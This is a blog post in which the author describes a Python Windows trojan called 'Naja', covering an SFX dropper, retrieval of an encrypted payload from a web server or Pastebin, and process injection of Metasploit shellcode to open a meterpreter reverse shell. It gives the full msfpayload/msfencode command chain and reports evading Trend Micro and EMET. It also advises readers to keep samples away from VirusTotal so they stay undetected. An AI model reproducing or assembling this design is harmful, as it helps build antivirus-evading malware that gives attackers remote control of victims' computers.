Naja: a genus of venomous elapid snakes known as cobras. Pseudonaja textilis, more commonly known as the Eastern brown snake, is considered the world’s second most venomous land snake based on its LD50 value in mice.

Naja – in this instance – is a Windows trojan developed by me in Python, inspired by several other Python projects (mentioned throughout this post), which makes use of Metasploit shellcode to facilitate a reverse connection to targets. It is distributed in two parts and makes heavy use of various encoding mechanisms and encryption in conjunction with process injection to bypass antivirus and other mitigations like Microsoft’s EMET.

Note: This post was originally made on 16 Dec ’14, but has since been updated.

 

operation

Inspiration for Naja came from the Veil Framework: a framework used to generate undetectable executable backdoors. In the case of Naja nowhere near as much flexiblity or automation is provided, but it  still fulfils my tasks quite nicely and has been an excellent learning experience.

  • An SFX executable unpacks a small Python script in addition to a full Python interpreter, allowing Python to be run on machines that do not have it installed.
  • The Python script calls out to a web server and retrieves an encrypted string (stored as a text file).
  • The string is decrypted and executed: a process is spawned with SeDebugPrivileges, a block of memory is allocated in the process, attacker defined shellcode is loaded into it and then invoked.
  • A meterpreter session is provided to the attacker.

 

requisites

  • python 2.7 x86
  • pycrypto for python 2.7
  • py2exe for python 2.7
  • pywin32 for python 2.7

 

folder structure

As below:

notes:

  • All directories must exist in order for the script to successfully run.

 

scripts

The underlying injection script (raw.py), a stripped out and modified for purpose version of pyinject.

 

demonstration

Shellcode is first generated and formatted on the attacking machine using a rather ugly chain of commands:

msfpayload LHOST= LPORT= EXITFUNC=thread R|msfencode -e x86/shikata_ga_nai -c 10 -t py|sed -e ‘s/buf =  \”\”//g’|sed -e ‘s/buf += \”//g’|sed ‘s/\”//g’|awk ‘BEGIN {FS=”\n”; RS=”-\n”}{if(NF>2){for(i=1;i<=NF;i++)printf(“%s “,$i);}}’|sed -r ‘s/\s+//g’

In case you don’t understand this, the command:
  1. Generates the raw shellcode.
  2. Encodes the shellcode.
  3. Strips unnecessary characters out of the shellcode.
  4. Pulls all of the text onto a single line.
  5. Removes any white space.

The purpose of this is so that it can be inserted into the command line as a single string:

… as done here:

A series of string manipulations then take place:
  1. The injection script has the shellcode substituted into it.
  2. An encryption key and some random variables are generated.
  3. The import section of the wrapper script is formed, and the random AES and base64 variable names substituted into it.
  4. The injection script is encrypted.
  5. The encrypted script is then wrapped with the decryption function, the whole lot converted to base64 and output to a text file.

Following this, the rest of the wrapper script is formed that can be packed by py2exe to produce the final executable:

The encrypted text file is uploaded to a web server or paste service like Pastebin (and retrieved in raw format), where it can be fetched by the backdoor at runtime:


Of course, this all works as intended:

… even with fully updated Trend Micro OfficeScan (with all features enabled) and EMET 5.1 with the maximum security profile configured:

It in fact is only detected by G Data:

For a fair while Clam AV simply didn’t like the packer – even when tested with a simple Hello World script. So I’m assuming that with enough pressure they realised that py2exe and pyinstaller are actually incredibly common, and not just used for nefarious purposes. This may be the same case with G Data.

 

final note

I urge you, if you decide to use this code yourself:

  • Do not upload anything produced to Hybrid Analysis, malwr or Virus Total. Please use No Distribute.
  • Do not use this maliciously. Base your own projects off of it, or use it for lab testing.
You can find the source code for this project on GitHub.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s